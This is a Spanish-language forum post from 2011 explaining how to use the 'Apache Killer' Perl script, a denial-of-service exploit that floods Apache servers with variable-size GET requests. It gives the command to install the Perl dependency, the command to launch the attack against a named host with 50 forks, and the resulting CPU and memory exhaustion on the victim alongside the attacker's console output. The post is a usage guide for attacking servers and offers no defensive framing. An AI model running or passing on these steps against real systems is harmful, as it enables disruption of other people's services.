Entrada editada a las 5:13 pm – septiembre 6, 2011 por fher98
Desde hace unas semanas existe un hilo en la lista de seguridad donde se esta discutiendo el nuevo script que utiliza el exploit de DoS sobre el servidor web de Apache.
Al enviar cientos de peticiones GET con tamaños variables logran que el servicio de apache empieze a comerse toda la memoria del servidor, a tal extremo que el porcentaje de utilizacion del CPU llega casi al 100%.
Como utilizar el script de exploit sobre Linux
Antes de poder ejecutar el exploit es necesario instalar una extension de perl, de la siguiente manera:
# cpan -i Parallel::ForkManager
Ahora bien, al ejecutar el script de apache killer en el atacante;
# perl killapache.pl servidor.com 50
En cuestion de segundos el objetivo o victima se empieza a comportarse asi:
Cpu(s): 97.0%us, 1.0%sy, 0.0%ni, 16.9%id, 2.7%wa, 0.0%hi, 0.3%si, 0.0%st
Mem: 4058796k total, 3654808k used, 403988k free, 233656k buffers
Swap: 5855652k total, 58028k used, 5797624k free, 559344k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
25580 www-data 20 0 247m 40m 1268 R 7 1.0 0:09.38 apache2
25651 www-data 20 0 247m 40m 1268 R 7 1.0 0:00.76 apache2
25315 www-data 20 0 261m 50m 5740 R 7 1.3 0:34.67 apache2
25371 www-data 20 0 247m 40m 1268 R 7 1.0 0:28.21 apache2
Mientras el cliente muestra en la consola:
host seems vuln
ATTACKING web [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING web [using 50 forks]
Como veran efectivamente el consumo de memoria y CPU en el servidor se satura al nivel de deshabilitar o relentisar los servicios.
perl killapache.pl example.com 50
Via | Hackers Garage
Iniciar Sesión 
Registrarse 
Miembros 
Buscar 
Forum
Responder 
Agregar Nuevo Tema 
Citar y Responder 
